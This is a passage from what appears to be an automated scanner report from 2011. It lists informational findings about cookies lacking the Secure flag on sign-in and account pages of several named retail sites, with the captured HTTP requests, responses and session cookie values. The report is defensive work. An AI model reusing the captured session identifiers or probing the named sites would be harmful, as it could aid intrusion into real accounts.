Connection: keep-alive
Referer: https://ordering.ftd.com/new-signup/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=677673227F5D107F0021C31926AF1C6A; TLTUID=677673227F5D107F0021C31926AF1C6A; si_path=1305510017585; bcp_path=1305510017585; scp_path=1305510017585; pp_path=1305510017585; mbcc=386C0C34-BEDD-551C-BC5F-0E4277B78457; s_vi=[CS]v1|26E84041051D2510-60000104200A48E2[CE]; foresee.analytics=%7B%22rr_domain%22%3A%22ftd.com%22%2C%22rr_version%22%3A12%2C%22rr_group_id%22%3A%221305510024780_3248%22%2C%22reccancelled%22%3Atrue%7D; track_id=bfa25c84bebbf15e8bc91502042c4463801bcd004d6700fcd6f4be1dbe08dc9c; pc1=%7b%7d; markcode=528; c1=%7B%22continue_shopping%22%3A%22%7B%5C%22name%5C%22%3A%5C%22Sweet%20Shop%5C%22%2C%5C%22type%5C%22%3A%5C%22index%5C%22%2C%5C%22value%5C%22%3A%5C%22%252Fsweet-shop-ctg%252Fproduct-sweet-shop%252F%253Fmarkcode%253D528%5C%22%2C%5C%22prevName%5C%22%3A%5C%22Home%20Page%5C%22%2C%5C%22prevType%5C%22%3A%5C%22home%5C%22%2C%5C%22prevValue%5C%22%3A%5C%22%252F%253Fmarkcode%253D528%5C%22%7D%22%7D; v_id=11503077676663641757469614643386; s_id=51933897653166366864628919699136; s_cc=true; last_active=1305541288018; mbcs=837A23D2-E1A6-55BC-B51D-1B2EBC885D29; auto_signed_out=; s_sq=ftdprod%3D%2526pid%253DCategory%25253Aproduct_sweet_shop%2526pidt%253D1%2526oid%253Dhttps%25253A//ordering.ftd.com/528/signin/%252523forgot-password%2526ot%253DA; fsr.a=1305541789414

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 10:39:19 GMT
Server: Apache
Set-Cookie: auto_signed_out=; expires=Sat, 03 Jan 1970 05:00:02 GMT; path=/
Vary: Accept-Encoding
P3P: CP="STA CUR TAI"
X-Accelerator-Vary: Accept-Encoding
X-VR-Note: gzip-me
Pragma: no-cache
Cache-Control: no-cache, private, no-store, max-age=0
Expires: Mon, 16 May 2011 10:39:20 GMT
Set-Cookie: pc1=%7b%7d; domain=.ftd.com; path=/; expires=Thu, 01 Jan 2099 05:00:00 GMT
Set-Cookie: s.events=0; domain=.ftd.com; path=/; expires=Thu, 22 Mar 1978 05:00:00 GMT
Connection: close
Content-Type: text/html
Content-Length: 98257


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/schema/"
xmlns:fb="http://www.facebook.c
...[SNIP]...

9.10. https://ordering.ftd.com/signin/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://ordering.ftd.com
Path:   /signin/

Issue detail

A cookie issued by the application over HTTPS does not have the secure flag set; see the Set-Cookie headers in the response below. Of the three cookies set there, auto_signed_out and s.events are being cleared (their Expires dates are in 1970 and 1978), so track_id is the one to review. It does not appear to contain a session token, which may reduce the risk associated with this issue; review its contents to determine its function.

Request

GET /signin/ HTTP/1.1
Host: ordering.ftd.com
Connection: keep-alive
Referer: http://www.ftd.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=677673227F5D107F0021C31926AF1C6A; TLTUID=677673227F5D107F0021C31926AF1C6A; si_path=1305510017585; bcp_path=1305510017585; scp_path=1305510017585; pp_path=1305510017585; mbcc=386C0C34-BEDD-551C-BC5F-0E4277B78457; s_vi=[CS]v1|26E84041051D2510-60000104200A48E2[CE]; foresee.analytics=%7B%22rr_domain%22%3A%22ftd.com%22%2C%22rr_version%22%3A12%2C%22rr_group_id%22%3A%221305510024780_3248%22%2C%22reccancelled%22%3Atrue%7D; markcode=528; c1=%7B%22continue_shopping%22%3A%22%7B%5C%22name%5C%22%3A%5C%22Home%20Page%5C%22%2C%5C%22type%5C%22%3A%5C%22home%5C%22%2C%5C%22value%5C%22%3A%5C%22%252F%253Fmarkcode%253D528%5C%22%7D%22%7D; v_id=11503077676663641757469614643386; s_id=22359894871736752832630692038142; s_cc=true; last_active=1305510812803; mbcs=129049F1-9E12-5C65-0540-FAB5539F48D0; auto_signed_out=; s_sq=ftdprod%3D%2526pid%253DHome%252520Page%2526pidt%253D1%2526oid%253Dhttps%25253A//ordering.ftd.com/528/signin/%252523forgot-password%2526ot%253DA; fsr.a=1305511186703

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 02:09:59 GMT
Server: Apache
Set-Cookie: track_id=baabe59f09870e0c5f1e6606009b9fb7e5a425b7fc231e55d6f4be1dbe08dc9c; expires=Thu, 13 May 2021 02:09:59 GMT; path=/; domain=.ftd.com
Set-Cookie: auto_signed_out=; expires=Sat, 03 Jan 1970 05:00:02 GMT; path=/
Vary: Accept-Encoding
P3P: CP="STA CUR TAI"
X-Accelerator-Vary: Accept-Encoding
X-VR-Note: gzip-me
Pragma: no-cache
Cache-Control: no-cache, private, no-store, max-age=0
Expires: Mon, 16 May 2011 02:09:59 GMT
Set-Cookie: s.events=0; domain=.ftd.com; path=/; expires=Thu, 22 Mar 1978 05:00:00 GMT
Connection: close
Content-Type: text/html
Content-Length: 113972


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/schema/"
xmlns:fb="http://www.facebook.c
...[SNIP]...

9.11. https://ordering.ftd.com/signin/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://ordering.ftd.com
Path:   /signin/

Issue detail

A cookie issued by the application over HTTPS does not have the secure flag set; see the Set-Cookie headers in the response below. auto_signed_out, create_account_from_toolbar and s.events are all being cleared (their Expires dates precede the response Date), so pc1, set until 2099 with the value %7b%7d (an empty JSON object), is the one to review. It does not appear to contain a session token, which may reduce the risk associated with this issue; review its contents to determine its function.

Request

POST /signin/ HTTP/1.1
Host: ordering.ftd.com
Connection: keep-alive
Referer: https://ordering.ftd.com/signin/
Cache-Control: max-age=0
Origin: https://ordering.ftd.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=677673227F5D107F0021C31926AF1C6A; TLTUID=677673227F5D107F0021C31926AF1C6A; si_path=1305510017585; bcp_path=1305510017585; scp_path=1305510017585; pp_path=1305510017585; mbcc=386C0C34-BEDD-551C-BC5F-0E4277B78457; s_vi=[CS]v1|26E84041051D2510-60000104200A48E2[CE]; foresee.analytics=%7B%22rr_domain%22%3A%22ftd.com%22%2C%22rr_version%22%3A12%2C%22rr_group_id%22%3A%221305510024780_3248%22%2C%22reccancelled%22%3Atrue%7D; markcode=528; c1=%7B%22continue_shopping%22%3A%22%7B%5C%22name%5C%22%3A%5C%22Home%20Page%5C%22%2C%5C%22type%5C%22%3A%5C%22home%5C%22%2C%5C%22value%5C%22%3A%5C%22%252F%253Fmarkcode%253D528%5C%22%7D%22%7D; v_id=11503077676663641757469614643386; s_cc=true; last_active=1305510812803; auto_signed_out=; s_sq=ftdprod%3D%2526pid%253DHome%252520Page%2526pidt%253D1%2526oid%253Dhttps%25253A//ordering.ftd.com/528/signin/%252523forgot-password%2526ot%253DA; fsr.a=1305511191739; track_id=bfa25c84bebbf15e8bc91502042c4463801bcd004d6700fcd6f4be1dbe08dc9c
Content-Length: 120

AID=myaccount_signin&website_id=528&reminder_service=&new=&email_isvalid=0&submitted=1&email=&password=&x=22&y=9&source=

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 10:28:24 GMT
Server: Apache
Set-Cookie: auto_signed_out=0; expires=Sun, 15 May 2011 10:28:25 GMT; path=/; domain=.ftd.com
Set-Cookie: create_account_from_toolbar=0; expires=Sun, 15 May 2011 10:28:25 GMT; path=/; domain=.ftd.com
Set-Cookie: auto_signed_out=; expires=Sat, 03 Jan 1970 05:00:02 GMT; path=/
Vary: Accept-Encoding
P3P: CP="STA CUR TAI"
X-Accelerator-Vary: Accept-Encoding
X-VR-Note: gzip-me
Set-Cookie: pc1=%7b%7d; domain=.ftd.com; path=/; expires=Thu, 01 Jan 2099 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, private, no-store, max-age=0
Expires: Mon, 16 May 2011 10:28:25 GMT
Set-Cookie: s.events=0; domain=.ftd.com; path=/; expires=Thu, 22 Mar 1978 05:00:00 GMT
Connection: close
Content-Type: text/html
Content-Length: 114156


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/schema/"
xmlns:fb="http://www.facebook.c
...[SNIP]...

9.12. https://secure.bluenile.com/accounts/account-sign-in.html

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.bluenile.com
Path:   /accounts/account-sign-in.html

Issue detail

The following cookies were issued by the application and do not have the secure flag set: bnses, stc, SID and bncust. In the response below only JSESSIONID carries the Secure attribute, and SID is being cleared (empty value, Expires in 1970). The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /accounts/account-sign-in.html HTTP/1.1
Host: secure.bluenile.com
Connection: keep-alive
Referer: http://www.bluenile.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=F59437BB_F744_4338_9666_F1641BDAF3E0; __utmz=1.1305510928.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.637722072.1305510928.1305510928.1305510928.1; __utmc=1; __utmb=1.1.10.1305510928; testcookie=; sitetrack=jse~1; stc=3NZR3Q; bnper=ver~3&NIB~0&CURR~USD&CURR_SYM~%24&CONTEXT-NAME~53&DM~-&SUB~false; bnses=ver~1&ace~false&isbml~false&fbcs~true&new~false&ss~0&mbpop~false; pop=sweeps~1

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 02:06:37 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
P3P: CP="NOI DSP DEVa TAIa OUR BUS UNI STA":
Set-Cookie: JSESSIONID=C4A385CE7874D0A2B551FC74E3744D04; Path=/; Secure
Set-Cookie: bnses=ver~1&ace~false&isbml~false&fbcs~true&new~false&ss~1&mbpop~false; Domain=.bluenile.com; Path=/
Set-Cookie: stc=3NZR3Q; Domain=.bluenile.com; Expires=Sat, 12-Nov-2011 02:06:40 GMT; Path=/
Set-Cookie: SID=""; Domain=.bluenile.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: bncust=ver~1&SignInURL~http%3A%2F%2Fwww.bluenile.com%2F; Domain=.bluenile.com; Expires=Tue, 15-May-2012 02:06:40 GMT; Path=/
Vary: Accept-Encoding
Content-Length: 63219


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Your
...[SNIP]...

9.13. https://www.brookstone.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.brookstone.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the secure flag set: TS657dfa, the only Set-Cookie in the response below. Cookies with this TS-plus-hex naming are typically set by an F5 BIG-IP device in front of the application rather than by the application code, and the cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
Host: www.brookstone.com
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26E841FF051D3756-4000010C200DDEB1[CE]; JSESSIONID=B4E0235D8822C4DE7BE6C831C54E4E62; TS657dfa=f5d54e710c8ae3d5dcd77d6f57bcade2e754034066e5db8e4dd0fb6760ac0ec56e0e0800; s_pers=%20s_nr%3D1305511115723%7C1368583115723%3B%20s_lv%3D1305511115727%7C1400119115727%3B%20s_lv_s%3DFirst%2520Visit%7C1305512915727%3B%20s_vs%3D1%7C1305543325583%3B; s_sess=%20s_evar2%3Dsubcategorylandingpage_home_beanbag_chairs_kids%257Cc1topproducts1fdt%257C11370241%3B%20s_cc%3Dtrue%3B%20ttc%3D1305541525579%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
ETag: W/"52413-1280871734000"
Last-Modified: Tue, 03 Aug 2010 21:42:14 GMT
Content-Type: image/x-icon
Content-Length: 52413
Date: Mon, 16 May 2011 10:36:08 GMT
Set-Cookie: TS657dfa=0b3c2fa6061f93d60514f85a08946e42e754034066e5db8e4dd0fe1860ac0ec56e0e0800; Path=/

..............h.......(....... ...............................00/.EED.............""!.....**).++*.HHH.997.221.443.............]]\.....            .....%%$.....##".RRQ.gff.''%...........-.................III...
...[SNIP]...

9.14. https://www.brookstone.com/formhandlerservlet

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.brookstone.com
Path:   /formhandlerservlet

Issue detail

The following cookie was issued by the application and does not have the secure flag set: TS657dfa, the only Set-Cookie in the response below (the same cookie as in 9.13, reissued with a new value). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /formhandlerservlet?currentNodeLink=/shoppingCart.jsp&formName=updateCart_checkout HTTP/1.1
Host: www.brookstone.com
Connection: keep-alive
Referer: http://www.brookstone.com/shoppingCart.jsp.vr
Cache-Control: max-age=0
Origin: http://www.brookstone.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26E841FF051D3756-4000010C200DDEB1[CE]; JSESSIONID=B4E0235D8822C4DE7BE6C831C54E4E62; TS657dfa=f5d54e710c8ae3d5dcd77d6f57bcade2e754034066e5db8e4dd0fb6760ac0ec56e0e0800; s_pers=%20s_nr%3D1305511115723%7C1368583115723%3B%20s_lv%3D1305511115727%7C1400119115727%3B%20s_lv_s%3DFirst%2520Visit%7C1305512915727%3B%20s_vs%3D1%7C1305543312191%3B; s_sess=%20s_evar2%3Dsubcategorylandingpage_home_beanbag_chairs_kids%257Cc1topproducts1fdt%257C11370241%3B%20s_cc%3Dtrue%3B%20s_sq%3Dbstoneprod%253D%252526pid%25253Dcheckout%2525253Acart%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.brookstone.com/shoppingCart.jsp.vr%25252523_4%252526oidt%25253D1%252526ot%25253DA%252526oi%25253D1%3B
Content-Length: 21

quantity_1343815425=1

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, pre-check=0, post-check=0, private
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 16 May 2011 10:36:05 GMT
Set-Cookie: TS657dfa=2eff89a1b2ef875f19c572c08f6b8043e754034066e5db8e4dd0fe1660ac0ec56e0e0800; Path=/
Content-Length: 92549


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="EN">
<!-- Generated by
...[SNIP]...

9.15. https://www.restorationhardware.com/my-account/forgot-password.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.restorationhardware.com
Path:   /my-account/forgot-password.jsp

Issue detail

The following cookie was issued by the application and does not have the secure flag set: TS1c138a, the only Set-Cookie in the response below. Cookies with this TS-plus-hex naming are typically set by an F5 BIG-IP device in front of the application rather than by the application code, and the cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /my-account/forgot-password.jsp HTTP/1.1
Host: www.restorationhardware.com
Connection: keep-alive
Referer: https://www.restorationhardware.com/my-account/sign-in.jsp?link=topnav_signin
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=Wlhqnnp++zh3PRP2EtG-iQ**.782P2R9; __utmz=108701569.1305509985.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); promobanner=viewed; TS1c138a=5027a1be02767df2db70577946ccc3192efa223a5124b4964dd0899e; __utma=108701569.1225998754.1305509985.1305509985.1305509985.1; __utmc=108701569; engagement=4; fsr.s={"v":1,"rid":"1305509997099_983249","pv":3,"to":5,"c":"https://www.restorationhardware.com/my-account/sign-in.jsp","lc":{"d0":{"v":3,"s":false,"e":1}},"cd":0,"sd":0,"f":1305511158757,"cp":{"my-account":"visited"}}; cmRS=&t1=1305511192547&t2=1305511197283&t3=1305541160118&fti=&fn=UNDEFINED%3A0%3B&ac=&fd=&uer=&fu=&pi=my-account%20sign-in&ho=cimg-1.restorationhardware.com/cm%3F&ci=90007517&ul=https%3A//www.restorationhardware.com&rf=http%3A//www.restorationhardware.com/content/promo.jsp%3Fid%3D138040%26%26link%3DSFGalleryStore

Response

HTTP/1.1 200 OK
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP05 (build: SVNTag=JBPAPP_4_2_0_GA_CP05 date=200810231548)/JBossWeb-2.0
X-ATG-Version: version=QVRHUGxhdGZvcm0vOS4yIFsgRFBTTGljZW5zZS8wIEIyQ0xpY2Vuc2UvMCAgXQ==
Content-Type: text/html;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Mon, 16 May 2011 10:24:01 GMT
Connection: keep-alive
Set-Cookie: TS1c138a=b72ce5406b61a765c4dbe2b4990160aa2efa223a5124b4964dd0ffea; Path=/
Cache-Control: max-age=0
Expires: Mon, 16 May 2011 10:24:00 GMT
Content-Length: 17767

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">    
       <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
           <hea
...[SNIP]...

9.16. https://www.restorationhardware.com/my-account/register.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.restorationhardware.com
Path:   /my-account/register.jsp

Issue detail

The following cookie was issued by the application and does not have the secure flag set: TS1c138a, the only Set-Cookie in the response below. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /my-account/register.jsp HTTP/1.1
Host: www.restorationhardware.com
Connection: keep-alive
Referer: https://www.restorationhardware.com/my-account/forgot-password.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=Wlhqnnp++zh3PRP2EtG-iQ**.782P2R9; __utmz=108701569.1305509985.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); promobanner=viewed; __utma=108701569.1225998754.1305509985.1305509985.1305509985.1; __utmc=108701569; TS1c138a=27552492896cbb9145e280ea3c546c112efa223a5124b4964dd0fed4; engagement=5; fsr.s={"v":1,"rid":"1305509997099_983249","pv":4,"to":5,"c":"https://www.restorationhardware.com/my-account/forgot-password.jsp","lc":{"d0":{"v":4,"s":true,"e":2}},"cd":0,"sd":0,"f":1305541164254,"cp":{"my-account":"visited"}}; cmRS=&t1=1305541182545&t2=1305541183619&t3=1305541273137&t4=1305541164256&fti=&fn=requestPassword%3A0%3B&ac=&fd=&uer=&fu=&pi=my-account%20forgot-password&ho=cimg-1.restorationhardware.com/cm%3F&ci=90007517

Response

HTTP/1.1 200 OK
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP05 (build: SVNTag=JBPAPP_4_2_0_GA_CP05 date=200810231548)/JBossWeb-2.0
X-ATG-Version: version=QVRHUGxhdGZvcm0vOS4yIFsgRFBTTGljZW5zZS8wIEIyQ0xpY2Vuc2UvMCAgXQ==
Content-Type: text/html;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Mon, 16 May 2011 10:32:23 GMT
Connection: keep-alive
Set-Cookie: TS1c138a=c8ca4c79fc3e7bb28d932b5bb1dcf3292efa223a5124b4964dd101e1; Path=/
Cache-Control: max-age=0
Expires: Mon, 16 May 2011 10:32:23 GMT
Content-Length: 20125

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">    
       <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
           <hea
...[SNIP]...

9.17. https://www.restorationhardware.com/my-account/sign-in.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.restorationhardware.com
Path:   /my-account/sign-in.jsp

Issue detail

The following cookie was issued by the application and does not have the secure flag set: TS1c138a, the only Set-Cookie in the response below. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /my-account/sign-in.jsp?link=topnav_signin HTTP/1.1
Host: www.restorationhardware.com
Connection: keep-alive
Referer: http://www.restorationhardware.com/content/promo.jsp?id=138040&&link=SFGalleryStore
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=Wlhqnnp++zh3PRP2EtG-iQ**.782P2R9; __utmz=108701569.1305509985.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); promobanner=viewed; TS1c138a=5027a1be02767df2db70577946ccc3192efa223a5124b4964dd0899e; fsr.s={"v":1,"rid":"1305509997099_983249","pv":2,"to":5,"c":"http://www.restorationhardware.com/","lc":{"d0":{"v":2,"s":false}},"cd":0,"sd":0,"f":1305511158757}; __utma=108701569.1225998754.1305509985.1305509985.1305509985.1; __utmc=108701569; __utmb=108701569.3.10.1305509985; engagement=3; fsr.a=1305511164164

Response

HTTP/1.1 200 OK
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP05 (build: SVNTag=JBPAPP_4_2_0_GA_CP05 date=200810231548)/JBossWeb-2.0
X-ATG-Version: version=QVRHUGxhdGZvcm0vOS4yIFsgRFBTTGljZW5zZS8wIEIyQ0xpY2Vuc2UvMCAgXQ==
Content-Type: text/html;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Mon, 16 May 2011 02:09:55 GMT
Connection: keep-alive
Set-Cookie: TS1c138a=ef27e626254569019b6a3249227030c92efa223a5124b4964dd08c1b; Path=/
Cache-Control: max-age=0
Expires: Mon, 16 May 2011 02:09:55 GMT
Content-Length: 19152

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">    
       <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
           <hea
...[SNIP]...

9.18. https://www.restorationhardware.com/sitewide/data/json/profile-status.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.restorationhardware.com
Path:   /sitewide/data/json/profile-status.jsp

Issue detail

The following cookie was issued by the application and does not have the secure flag set: TS1c138a, the only Set-Cookie in the response below. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /sitewide/data/json/profile-status.jsp?_=1305511192551 HTTP/1.1
Host: www.restorationhardware.com
Connection: keep-alive
Referer: https://www.restorationhardware.com/my-account/sign-in.jsp?link=topnav_signin
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/json, text/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=Wlhqnnp++zh3PRP2EtG-iQ**.782P2R9; __utmz=108701569.1305509985.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); promobanner=viewed; TS1c138a=5027a1be02767df2db70577946ccc3192efa223a5124b4964dd0899e; __utma=108701569.1225998754.1305509985.1305509985.1305509985.1; __utmc=108701569; __utmb=108701569.3.10.1305509985; engagement=3; fsr.a=1305511192538; fsr.s={"v":1,"rid":"1305509997099_983249","pv":2,"to":5,"c":"http://www.restorationhardware.com/","lc":{"d0":{"v":2,"s":false}},"cd":0,"sd":0,"f":1305511158757,"cp":{"my-account":"visited"}}

Response

HTTP/1.1 200 OK
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP05 (build: SVNTag=JBPAPP_4_2_0_GA_CP05 date=200810231548)/JBossWeb-2.0
X-ATG-Version: version=QVRHUGxhdGZvcm0vOS4yIFsgRFBTTGljZW5zZS8wIEIyQ0xpY2Vuc2UvMCAgXQ==
Content-Type: application/json;charset=ISO-8859-1
Content-Length: 94
Date: Mon, 16 May 2011 02:10:10 GMT
Connection: keep-alive
Set-Cookie: TS1c138a=5bd8da43812e2d44f3717ac9451ad5a82efa223a5124b4964dd08c2a; Path=/
Cache-Control: max-age=0
Expires: Mon, 16 May 2011 02:10:10 GMT


{"status":"-1","cartCount":"0"
   ,"wishList":"gl390568157"
   ,"giftLists":[]
   ,"firstName":""}

9.19. https://www.restorationhardware.com/sitewide/includes/header/expanding-banner-controller.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.restorationhardware.com
Path:   /sitewide/includes/header/expanding-banner-controller.jsp

Issue detail

The following cookie was issued by the application and does not have the secure flag set: TS1c138a, the only Set-Cookie in the response below. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /sitewide/includes/header/expanding-banner-controller.jsp?categoryId=&section=my-account&subsection=sign-in&_=1305511197171 HTTP/1.1
Host: www.restorationhardware.com
Connection: keep-alive
Referer: https://www.restorationhardware.com/my-account/sign-in.jsp?link=topnav_signin
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/html, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=Wlhqnnp++zh3PRP2EtG-iQ**.782P2R9; __utmz=108701569.1305509985.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); promobanner=viewed; TS1c138a=5027a1be02767df2db70577946ccc3192efa223a5124b4964dd0899e; __utma=108701569.1225998754.1305509985.1305509985.1305509985.1; __utmc=108701569; __utmb=108701569.3.10.1305509985; fsr.s={"v":1,"rid":"1305509997099_983249","pv":2,"to":5,"c":"http://www.restorationhardware.com/","lc":{"d0":{"v":2,"s":false}},"cd":0,"sd":0,"f":1305511158757,"cp":{"my-account":"visited"}}; engagement=4; fsr.a=1305511197072

Response

HTTP/1.1 200 OK
